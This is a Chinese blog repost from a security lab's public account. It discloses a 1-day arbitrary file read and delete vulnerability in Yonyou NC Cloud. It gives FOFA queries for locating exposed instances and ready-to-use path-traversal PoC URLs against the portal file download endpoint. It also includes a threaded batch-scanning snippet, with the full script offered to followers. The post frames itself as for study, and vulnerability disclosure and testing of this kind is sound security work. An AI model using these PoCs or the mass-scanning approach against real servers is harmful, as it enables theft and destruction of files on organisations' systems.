[1day]用友NC存在任意文件读取删除漏洞[附批量POC]

本文报道了用友NCCloud平台存在任意文件读取和删除漏洞,通过POC方法展示了如何利用这些漏洞,并提供了批量测试脚本。强调测试仅供学习,用户需注意法律责任。
摘要由CSDN通过智能技术生成

关注本公众号,长期推送漏洞文章

知攻善防实验室

红蓝对抗,Web渗透测试,红队攻击,蓝队防守,内网渗透,漏洞分析,漏洞原理,开源 工具,社工钓鱼,网络安全。

73篇原创内容

公众号

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

简介

用友NC Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现人、财、物、客的 全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。

用友NC的download文件存在任意文件读取和任意文件删除漏洞,攻击者可以利用该漏洞读取或删除服务器上的敏感文件。

资产

fofa:app="用友-UFIDA-NC"

图片

fofa:title="YONYOU NC"

图片

漏洞复现


任意文件读取:

POC:

/portal/pt/xml/file/download?pageId=login&filename=..\index.jsp

任意文件删除:

/portal/pt/xml/file/download?pageId=login&filename=../index.jsp

区别在于"\"和"/"

直接拼接URL即可下载文件

图片

批量测试:

通过线程池进行批量测试

with concurrent.futures.ThreadPoolExecutor(max_workers=8) as executor:     executor.map(check_vulnerability, targets)

更改max_workers即可限制线程池数量

图片

脚本获取地址:

关注本公众号"知攻善防实验室":后台回复"1107"获取

后台回复:“交流群”获取技术交流群链接

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值